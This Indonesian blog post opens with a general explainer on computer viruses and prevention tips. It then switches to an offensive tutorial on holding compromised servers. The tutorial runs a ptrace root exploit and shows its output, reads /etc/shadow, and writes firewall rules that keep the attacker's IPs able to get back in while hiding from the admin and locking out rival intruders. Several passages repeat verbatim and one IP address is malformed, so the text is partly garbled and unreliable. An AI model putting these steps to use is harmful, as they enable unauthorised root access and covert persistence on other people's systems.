Terus terang penulis merasa bosan, mungkin juga Anda karena semua buku tentang virus selalu mendefinisikan virus komputer dan Anda, juga bekas saya tidak mengerti bagaimana virus komputer itu sebenarnya. Tapi untuk menulis buku tentang virus adalah lucu jika penulis tidak mendefinisikan virus
komputer itu.
Sebelum penulis mendefinisikan apa itu virus komputer, penulis mempunyai sedikit cerita mengenai virus komputer. Pengalaman temanku yang pernah bekerja dibagian technical di bidang networking sekitar 5 th lalu. Ceritanya saat itu temanku sedang menginstall software untuk customer yaitu software lotus dari sebuah
disket. Ternyata gara-gara disket tersebut, komputer tersebut terkena virus boot record, dan tentunya Anda tahu bahwa penulis diomelin oleh yang punya komputer secara babi buta.
Perlu Anda ketahui bahwa komputer tersebut menggunakan versi dos 6.20. Karena penulis hanya mempunyai disket instalasi Dos versi 6.22, maka penulis menginstallkan versi dos 6.22 tersebut untuk membasmi virus boot record tersebut. Setelah selesai maka virus itupun hilang. Tetapi karena versi dos yang berbeda (dari 6.20 ke 6.22) maka vsafe yang mengecak perubahan file dari dengan file ”chkdsk.ms” selalu melaporkan bahwa ukuran file telah berubah dan mungkin file tersebut telah terserang virus yang padahal perubahan itu adalah karena perubahan versi dos dari 6.20 ke dos 6.22 sehingga pemilik komputer itu masih terus mengomel-ngomel. Penulis berusaha menjelaskan tetapi dijawab bahwa ia sudah memakai komputer puluhan tahun sedangkan penulis yang baru memakai komputer dianggap tidak tahu apa-apa selain bongkar-pasang komputer.
Akhirnya penulis mengalah dan penulis disuruh untuk mengganti Sim Card(memory) dan HardDisk. Padahal apa hubungannya virus tersebut dengan Sim card maupun HardDisk ?. Sedikit cerita diatas adalah suka duka penulis ketika selalu berhadapan dengan customer yang mempunyai berbagi sifat, pengetahuan dan latar belakang yang berbeda. Penulis hanya mengharapkan supaya Anda yang mengerti baik mengerti banyak maupun sedikit janganlah terlalu tinggi hati dan barbagilah ilmu tersebut dengan orang lain karena bagaimanapun juga Kita masih belum apa-apanya jika dibandingkan dengan anak-anak kecil yang maniak komputer seperti di AS maupun di Jepang.
Virus komputer adalah program yang ditulis, biasanya dengan bahasa tingkat rendah seperti assembly yang mempunyai kemampuan untuk menyebarkan dirinya dari satu program ke program lainnya. Virus komputer tidaklah sama dengan virus penyakit, karena virus komputer tidak berwujud. Ia dinamakan sebagai Virus komputer hanya karena mempunyai kemampuan seperti virus penyakit yang mampu meyebarkan dirinya dan umumnya bersifat merugikan. Virus komputer bisa dibuat dengan mudah oleh para pakar software terutama bagi yang menguasai bahasa tingkat rendah seperti bahasa assembly dan kemampuan untuk mengerti cara kerja dari sistem operasi. Tapi saat sekarang telah banyak virus yg dibuat dengan bahasa tingkat tinggi seperti makro, dlsb
Bagaimana Virus Menyebarkan Dirinya
Virus hanya bisa menyebarkan diri jika diaktifkan atau jikaia dieksekusi. Jadi adalah tidak mungkin bagi virus untuk menyebarkan dirinya melalui file Ascii dan juga tidak mungkin komputer Anda terserang virus karena ada disket bervirus yang ditaruh ke dalam drive komputer Anda tanpa dieksekusi dan lebih mustahil lagi jika disket Anda maupun komputer Anda terserang virus karena adanya komputer atau disket bervirus yang berada didekatnya.
Karena itu biasanya virus menyebarkan diri melalui file yang bisa dieksekusi seperti, .com, .exe, .bat,.Ovl.,Drv dan lain-lainnya. Untuk Menyebarkan Dirinya, virus biasanya akan menempelkan dirinya didalam file eksecutable sehingga ia akan dijalankan jika file tempat ia menumpang dijalankan.
Yang perlu Anda ingat adalah, bahwa virus komputer bukanlah suatu yang hidup seperti virus-virus penyakit yang Kita kenal yang bisa saja menyebar melaui udara dan media perantara lainnya. Virus komputer sama saja dengan program-program biasa yang hanya bisa aktif jika dieksekusi, jadi adalah tidak mungkin jika virus bisa aktif tanpa dieksekusi sehingga biasanya virus selalu menumpang pada program yang bisa dieksekusi. Virus tidak dapat menyebar melalui file yang tidak dieksekusi, seperti file data teks dan lain sebagainya. tetapiperlu Anda ingat bahwa virus komputer bisa merusak apapun juga yang ada dikomputer kecuali hardware. Sepengetahuan penulis, belum ada virus yang mampu merusak hardware komputer seperti meledakkan monitor, merusakkan memory ,keyboard dan lain sebagainya.
Bisakah Virus Dibuat orang Awam ?
Untuk Membuat Virus diperlukan pengetahuan yang tidak sedikit. Anda dituntut untuk menguasai bahasa tingkat rendah yang terkenal susah untuk dipelajari dan pengetahuan tentang sistemoperasi. Dengan demikian untuk membuat virus bagi orang awam adalah sangat susah tapi sangatlah mungkin bagi orang awam untuk belajar mengetahui dan mengantisipasi virus walaupun ia tidak mengetahui cara membuat virus itu secara pasti. Untuk virus dengan bahasa tingkat tinggi, semakin memudahkan orang untuk membuat virus tanpa menguasai bhs assembly yang terkenal rumit, yang anda butuhkan hanyalah pengetahuan yang selalu dirahasiakan.
Ini adalah pertanyaan yang selalu ada dibenak penulis ketika baru berkenalan dengan komputer dan virus komputer. Tapi saat ini rasanya penulis mendapatkan jawabannya bahwa sampai saat ini belum ada anti virus yang mampu mencegah semua virus yang beredar. Hal ini dikarenakan cara kerja virus yang berbeda-beda sehingga untuk mencegah ataupun mengobati virus, anti virus harus mengetahui terlebih dahulu cara kerja virus tersebut sehingga tidak akan ada anti virus yang bisa mencegah dan mengobati semua virus yang telah dan akan beredar.
Mungkinkah Program Anti Virus Menjadi Penular Virus ?
Program anti virus sebenarnya juga merupakan program biasa yang bisa terserang virus. Bila program anti virus Anda telah terserang virus, maka justru program anti virus Andalah yang akan menjadi penular virus kepada program dan komputer lainnya. Untuk itu disarankan agar Anda selalu menyimpan anti virus pada disket yang masih bersih.
Perlu juga Anda ketahui bahwa ada juga program anti virus yang bisa memeriksa dirinya sendiri dan menyembuhkan dirinya sendiri bila terserang virus komputer. Walaupun demikian Anda tetap dianjurkan untuk tetap menyimpan juga cadangan program anti virus pada disket yang bersih dari virus karena cara ini
lebih aman. Disket Anda juga seharusnya di proteksi, sehingga tidak dapat terjadi penulisan pada disket sehingga virus tidak dapat meyerang program anti virus Anda yang berada di disket.
Apa Yang Biasanya Virus Lakukan ?
Tidak ada yang mengetahui secara pasti apa yang bakal dilakukan oleh sebuah virus, karena itu sangat tergantung dari pembuatnya. Sebuah virus mungkin saja hanya akan menampilkan pesan pada waktu yang telah ditentukan ataupun hanya memperbanyak dirinya tanpa melakukan sesuatu yang nyata. Ada juga virus yang sangat berbahaya seperti virus yang dibuat secara khusus untuk merusak sistem ataupun untuk mengambil keuntungan pribadi seperti mencuri uang dan rahasia perusahaan maupun rahasia negara. Dapat dikatakan semua virus yang beredar tidak ada yang menguntungkan Kita, karena program virus yang parasit biasanya akan merusak ataupun akan mengacaukan program Kita walaupun mungkin dari pembuat virus itu sendiri tidak mengharapkan demikian.
Apa Yang harus Saya Lakukan Jika Komputer Saya Terserang Virus ?
Langkah yang paling pertama yang dapat Anda lakukan adalah jangan panik. Usahakanlah untuk membackup semua data Anda yang penting, tapi ingat jangan membackup program-program yang telah terserang virus. Bila Anda bisa mengetahui secara pasti jenis virus yang menyerang komputer Anda, carilah anti virus, kalau bisa carilah anti virus buatan local karena biasanya lebih bagus. Bila Anda tidak mengetahui secara pasti virus
yang menyerang komputer Anda cobalah pakai anti virus yang ada dipasaran seperti scan, nav, dll untuk mendeteksi virus tersebut dan untung-untungan virus tersebut bisa dikenal dan dibasmi oleh anti virus tersebut. Jika Anda tidak bisa menemukan anti virusnya, maka langkah terakhir adalah memformat ulang harddisk Anda dengan disket bersistem yang bersih dari virus dan Anda terpaksa harus menginstall ulang semua aplikasi Anda.
Bagaimana Caranya Supaya Komputer Saya Tidak Terserang Virus ?
Penulis tidak bisa memberikan Anda resep yang bisa mencegah supaya komputer Anda terbebas dari virus 100%, karena komputer penulispun sering terkena virus komputer. Tetapi untuk mencegah atau meminimalkan supaya virus komputer tidak gampang menyerang komputer Anda, penulis bisa memberikan Anda saran :
- Virus komputer biasanya disebarkan melalui disket yang dipakai pada beberapa komputer, karena itu hindarilah atau selalu periksa disket yang dipakai bersama.
- Jika Anda hendak menginstall program, pastikan itu adalah disket asli yang terproteksi atau carilah instalasi yangberasal dari CD.
Jangan biarkan sembarang orang untuk memakai komputer Anda.
- Hindarilah mengambil sembarang program dari internet dari sumber yang tidak jelas.
Jangan sembarang memakai game, karena biasanya game adalah media yang bagus bagi virus untuk menyebarkan dirinya.
Pakailah program anti virus yang residen di komputer Anda untuk mendeteksi dan memonitor jika terdapat sesuatu yang mencurigakan.
- Selalulah pakai anti virus yang terbaru, karena anti virus yang terbaru selalu mengikuti perkembangan terbaru dari virus yang beredar.
- Perhatikanlah jika terjadi sesuatu yang janggal atau yang tidak biasa pada komputer Anda, seperti terjadi penulisan ataupun pembacaan pada harddisk yang tidak biasanya. Anda juga harus memperhatikan jika tiba-tiba komputer Anda menjadi lebih lambat ketika menjalankan suatu aplikasi, karena hal ini biasanya diakibatkan oleh program virus yang ikut dijalankan.
Jika bisa, perhatikan ukuran dari file eksecutable Anda. Jika ukuran file eksekutable Anda bertambah maka hampir dapat dipastikan jika komputer Anda telah terserang virus komputer.
5 Langkah Mengamankan Shell Anda menggunakan ipchains/iptables
Kehilangan sesorang yang selama ini dianggap tak ada, membuat saya berpikir/merenung, penyesalan ternyata selalu ada di belakang. Dan juga kebosanan di layar hitam membuat saya menulis tutorial ini. Disaat anda asik menjelajah dalam shell/server orang tiba-tiba anda di paksa keluar oleh orang yang tidak anda ketahui.. kesel kan, nah supaya hal ini tidak terjadi pada anda tutor berikut akan sangat berguna, Target Saat ini target yang paling banyak Vulnerable nya masih di dominasi oleh server-server Apache+openssl, disusul oleh Samba. Hal ini disebabkan karena sampai bulan Maret 2003 saja Server yang menggunakan Apache ada sekitar 24.486.857 buah atau sekitar 62% Bahan Shell untuk mencari target
Target, bisa dengan mass scanning bisa juga mencari satu persatu, ini masalah Anda In The Target
Setelah mendapatkan target apa yang Anda lakukan? Apa cukup download psybnc atau Eggdrop dan menjalankannya, yang cuman bertahan 5 menit :p atau paling lama sehari. Mau punya eggdrop atau psybnc yang awet kan ? Ikuti langkah-langkah berikut....
Setelah mendapatkan target apa yang Anda lakukan? Apa cukup download psybnc atau Eggdrop dan menjalankannya, yang cuman bertahan 5 menit :p atau paling lama sehari. Mau punya eggdrop atau psybnc yang awet kan ? Ikuti langkah-langkah berikut....
Langkah pertama
kenali system anda (target) memakai system apa, distro apa, menjalankan apa saja... caranya? masak nggak
tahu... bagi yang belum ngerti
tahu... bagi yang belum ngerti
bash-2.05a$cat /etc/issue
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
Dari sini kita tahu bahwa system kita memakai Distro RedHat versi 7.0, sekarang kita coba local exploit, krn sbg user kita nggak bisa mengamankan system kita, saran saya pake exploit ptrace Setelah download exploit nya kita gcc dan jalankan... bash2-0.5a$./ptrace
[+] Attached to 16097
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000fd1d
[+] Now wait for suid shell...
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
pengalaman saya kadang menemui beberapa server yang sepertinya tidak bisa diexploit menggunakan exploit ini, jangan putus asa, coba jalankan sekali lagi, sekali lagi dan sekali lagi sampai berhasil :p dan lebih sering tanda sh-2.05a# tidak akan muncul jika anda mengexploit memakai openssl, jadi rajin-rajinlah mengetahu jati diri dengan mengetikkan id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Langkah kedua,
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22smp on an i686
Dari sini kita tahu bahwa system kita memakai Distro RedHat versi 7.0, sekarang kita coba local exploit, krn sbg user kita nggak bisa mengamankan system kita, saran saya pake exploit ptrace Setelah download exploit nya kita gcc dan jalankan... bash2-0.5a$./ptrace
[+] Attached to 16097
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000fd1d
[+] Now wait for suid shell...
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
pengalaman saya kadang menemui beberapa server yang sepertinya tidak bisa diexploit menggunakan exploit ini, jangan putus asa, coba jalankan sekali lagi, sekali lagi dan sekali lagi sampai berhasil :p dan lebih sering tanda sh-2.05a# tidak akan muncul jika anda mengexploit memakai openssl, jadi rajin-rajinlah mengetahu jati diri dengan mengetikkan id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Langkah kedua,
ketahui interface ethernet card system anda, karena ini akan kita gunakan untuk membuat rule ipchains/iptables nantinya sh-2.05a#/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:4C:01:29:42
inet addr:203.253.11.xx Bcast:202.155.108.255 Mask:255.255.255.0
eth1 Link encap:Ethernet HWaddr 00:60:67:79:4B:E9
inet addr:192.168.68.82 Bcast:192.168.83.255 Mask:255.255.255.0
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
sebagian di potong untuk menghemat tempat, dan dalam hal ini itu nggak begitu penting, yang terpenting adalah mengetahui interface nya dalam hal ini eth0 dan eth1, lo udah pasti ada, inet addr juga perlu di catat beserta Mask (netMask nya)
eth0 Link encap:Ethernet HWaddr 00:E0:4C:01:29:42
inet addr:203.253.11.xx Bcast:202.155.108.255 Mask:255.255.255.0
eth1 Link encap:Ethernet HWaddr 00:60:67:79:4B:E9
inet addr:192.168.68.82 Bcast:192.168.83.255 Mask:255.255.255.0
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
sebagian di potong untuk menghemat tempat, dan dalam hal ini itu nggak begitu penting, yang terpenting adalah mengetahui interface nya dalam hal ini eth0 dan eth1, lo udah pasti ada, inet addr juga perlu di catat beserta Mask (netMask nya)
Langkah ketiga
Kita periksa apakah ipchains atau iptables sudah melaksanakan aksinya...
sh-2.05a#/sbin/ipchains -L
ipchains: Incompatible with this kernel
cuekin saja... kemungkinan module iptables lah yang dipake
sh-2.05a#/sbin/iptables -L
Chain INPUT (policy ACCEPT)
Chain FORWARD (policy ACCEPT)
Chain OUTPUT (policy ACCEPT)
asikkk krn belum ada rule sama sekali, kerjaan akan semakin gampang, kalau sudah ada rule akan sedikit ruwet, gunakan otakmu yah. hasil dari ipchains -L juga telihat sama kok (bagi system yang menggunakan ipchains, kalau kita ketik /sbin/iptables -L maka akan muncul pesan error untuk mengupgrade kernel) bla....bla... Perhaps iptables or your kernel needs to be upgraded.
Langkah keempat
Tugas kita selanjutnya adalah membuat rule ipchains atau iptables (tergantun dari hasil langkah ke tiga) untuk memblock port https (443) agar intruder2 lainnya nggak bisa masuk ke target kita lagi. Yang perlu di ingat adalah shell/server ataupun IP yang kita pergunakan untuk mengexploit target harus tetap bisa masuk ke target ini, artinya selain IP kita dan ip target (untuk menghindari kecurigaan admin, kok nggak bisa di access httpsnya) nggak bisa masuk ke port 443. Misalnya ipyang biasa kita gunakan mencari target adalah 202.68.19.82 dan 202.12.1.19.76 maka rule nya adalah
Rule ipchains nya:
sh-2.05a#/sbin/ipchains -A input -s 203.253.11.xx -j ACCEPT
sh-2.05a#/sbin/ipchains -A input -s 192.168.68.82/24 -j ACCEPT
sh-2.05a#/sbin/ipchains -A input -s 202.68.19.82 -j ACCEPT
sh-2.05a#/sbin/ipchains -A input -s 202.12.1.19.76 -j ACCEPT
sh-2.05a#/sbin/ipchains -A input -i lo -j ACCEPT
sh-2.05a#/sbin/ipchains -A input -d 203.253.11.xx 443 -p tcp -j REJECT
Rule iptables nya :
sh-2.05a#/sbin/ipchains -A INPUT -s 203.253.11.xx -j ACCEPT
sh-2.05a#/sbin/ipchains -A INPUT -s 192.168.68.82/24 -j ACCEPT
sh-2.05a#/sbin/ipchains -A INPUT -s 202.68.19.82 -j ACCEPT
sh-2.05a#/sbin/ipchains -A INPUT -s 202.12.1.19.76 -j ACCEPT
sh-2.05a#/sbin/ipchains -A INPUT -i lo -j ACCEPT
sh-2.05a#/sbin/ipchains -A INPUT -d 203.253.11.xx -p tcp --dport 443 -j REJECT
Keterangan :
selengkapnya bisa baca-baca di http://www.linuxguruz.org/iptables/ atau tanya paman Google baris pertama segala yang masuk berasal dari IP 203.253.11.xx di terima baris kedua sampai keempat sama seperti baris pertama cuman source nya saja yang berbeda yang kedua agar ip local networknya masih tetap bisa mengaccess port https target kita, ini untuk mengurangi kecurigaan adminnya, baris ketiga dan keempat adalah IP kita agar sewaktu-waktu kalau user kita dihapus oleh root kita bisa masuk lagi ke sana lewat port
https baris kelima untuk loopback buat jaga-jaga juga biar admin nggak curiga nah baris terakhir berarti semua yang masuk ke IP 203.253.11.xx protokol tcp port 443 akan di REJECT atau di tolak
Kalau kamu mau nambahin agar access ssh nya di filter juga tinggal tambahin satu baris dan ganti angka 443 (hhtps) dengan angka 22 (ssh)Untuk samba? tinggal tambahkan port samba agar di filter.
Selanjutnya:
sh-2.05a#/sbin/service ipchains save //menyimpan file configurasi ipchains biasanya akan terbentuk
file /etc/sysconfig/ipchains
atau
sh-2.05a#/sbin/service iptables save //untuk iptables
sh-2.05a#chattr +suia /etc/sysconfig/ipchains //change attribut file configurasi
ketik "man chattr" untuk mengetahui arti/fungsi lengkapnya,
untuk iptables tinggal rubah ipchains menjadi iptables :
sh-2.05a#chattr +suia /etc/sysconfig/iptables
Sampai di sini Anda bisa sedikit menarik nafas, karena sudah berhasil mengamankan system dari intruder lainnya.Tugas selanjutnya adalah memeriksa apakah system anda masih sehat atau jangan-jangan sebelum anda mendarat di sini sudah ada intruder lainnya yang sudah menginjakkan kaki :) Kalau saya biasanya memeriksa file /etc/passwd dan file /etc/shadow sh-2.05a#cat /etc/passwdroot:x:0:0:root:/root:/bin/bash
.....deleted.....
vadmin:x:0:0:virtual admin:/sbin:/sbin/nologin
project:x:501:501:project:/home/project:/bin/bash
nari:x:502:502:nari:/home/nari:/bin/bash
cd:x:503:503::/sbin/cd:/bin/bash
dari sini kita mesti curiga si user cd kok aneh sendiri home nya nya di /sbin/cd truss comment nya juga kosong beda dengan yang dua di atas nya, yang kedua user vadmin, kalian sudah pasti curiga kalau sudah begini, apa yang akan dilakukan dengan yang satu ini? itu terserah anda, mau di hapus juga bisa, di biarkan juga nggak apa-apa.... saran saya access ssh di protek/REJECT biar dia nggak bisa masuk lagi, cara lainnya ganti shell nya dari
/bin/bash
menjadi
/dev/null
caranya: pastikan /dev/null sudah masuk ke dalam daftar shells
di /etc/shells , jika belum
sh-2.05a#echo "/dev/null" >> /etc/shells
sh-2.05a#chsh -s /dev/null cd
Changing shell for cd.
Shell changed.
Berikutnya adalah memeriksa file /etc/shadow sh-2.05a#cat /etc/shadow root:$1$6AMBRqgR$enOJoSLX7NXf6kuZMfbRq/:12150:0:99999:7:::
bin:*:12150:0:99999:7:::
.....deleted......
vadmin::12150:0:99999:7:::
nari::12150:0:99999:7:::134523415
sama seperti di atas kita mestinya mencurigai keduanya, krn seorang administrator tidak akan membiarkan usernya melakukan ini, ini sudah pasti kerjaan intruder.... Done!...
Langkah kelima
Memeriksa apakah system kita sudah dipasangi backdoor... ini adalah tahap yang paling sulit bagi pendatang baru, dan bisa mengakibatkan rusaknya system :p Jika Anda suka tantangan ikuti terus dan jika tak punya nyali cukup sampai di sini.
Dulu saya kesulitan bagaimana cara menemukan sesorang telah memasang backdoor di dalam system/target, karena tidak bisadengan netstat, ps -aux atau lainnya. Karena file-file ini sudah tergantikan oleh file yang sudah di modifikasi. Untuk memastikannya lakukan langkah berikut:
sh-2.05a#cat /etc/rc.d/rc.sysinit
......deleted......
wait
# Xntps (NTPv3 daemon) startup..
/usr/sbin/xntps -q
kalau kalian menemukan seperti ini saya pastikan bahwa system ini sudah terpasangi backdoor t0rnkit (untuk backdoor lainnya hampir sama, yang berbeda cuman nama file yang di load), untuk menghapusnya tidak cukup dengan menghapus file /usr/sbin/xntps saja, krn proses/service nya masih jalan, yang mana kalau kita ps aux tidak terlihat sama sekali, trus bagaimana cara mengetahuinya...Gampang! Hapus file ps, netstat dll atau hapus paket ps, netstat dll caranya :
sh-2.05a#whereis ps
ps: /bin/ps
sh-2.05a#rpm -qf /bin/ps
procps-2.0.7-3
sh-2.05a#whereis netstat
netstat: /bin/netstat
sh-2.05a#rpm -qf /bin/netstat
net-tools-1.56-2
di dalam contoh ini ada dua paket rpm yang harus kita re-install, langkah pertama tentu saja mendownload paket itu sesuai dengan distro target kita (dalam contoh target menggunakan Distro RedHat 7.0), kita cari paket tersebut di www.rpmfind.net dengan kata kunci procps dan net-tools
sh-2.05a#cd /usr/local/src //masuk ke directory /usr/local/src
sh-2.05a#wget ftp://ftp.rpmfind.net/linux/redhat/7.0/en/os/i386/RedHat/RPMS/net-tools-1.56-2.i386.rpm
ftp://ftp.rpmfind.net/linux/redhat/7.0/en/os/i386/RedHat/RPMS/procps-2.0.7-3.i386.rpm //download paket procps dan net-tools
PENTING!!!
sh-2.05a#chattr -suia /usr/bin/top /bin/ps //rubah attribut file ps dan top
sh-2.05a#rpm --erase --nodeps procps-2.0.7-3 //hapus paket procps walaupun ada depedencies
kalau muncul ini Anda tidak memperhatikan saya :p
removal of /usr/bin/top failed: Operation not permitted
removal of /bin/ps failed: Operation not permitted
sh-2.05a#rpm -ivh procps-2.0.7-3.src.rpm //install paket procps yang baru di download
procps ##################################################
sh-2.05a#ps -awx //Lihat process backdoor
......deleted......
2457 ? Z 0:00 /usr/sbin/xntps -q
sh-2.05a#kill -9 2457 //kill proses backdoor
sh-2.05a#chattr -suia /usr/sbin/xntps //rubah attribut file backdoor
sh-2.05a#rm -f /usr/sbin/xntps //hapus file backdoor
Untuk netsat dan lain-lainnya
PENTING!!!
sh-2.05a#chattr -suia /sbin/ifconfig /bin/netstat
sh-2.05a#rpm --erase --nodeps net-tools-1.56-2
kalau muncul ini Anda cuek bebek ;p
removal of /sbin/ifconfig failed: Operation not permitted
removal of /bin/netstat failed: Operation not permitted
sh-2.05a#rpm -ivh net-tools-1.56-2.src.rpm
net-tools ##################################################
Cara lainya yang lebih sederhana adalah menggunakan socklist, tapi pada system tertentu paket/file
ini tidak terinstal, socklist terdapat pada paket procinfo-xx-x (xx adalah versinya), dengan socklist kita bisa mengetahui socket/port berapasaja yang LISTENING dan siapa saja yang menjalankan port tersebut beserta nomor proses nya (PID).
Mengapa saya menyarankan memakai socklist ketimbang netstat, alasannya cuman satu yaitu:
Hampir semua backdoor tidak memodifikasi file socklist.
Done!...
Sekian tutorial saya, atas kesediannya membaca saya ucapkan terima kasih.
0 komentar:
Posting Komentar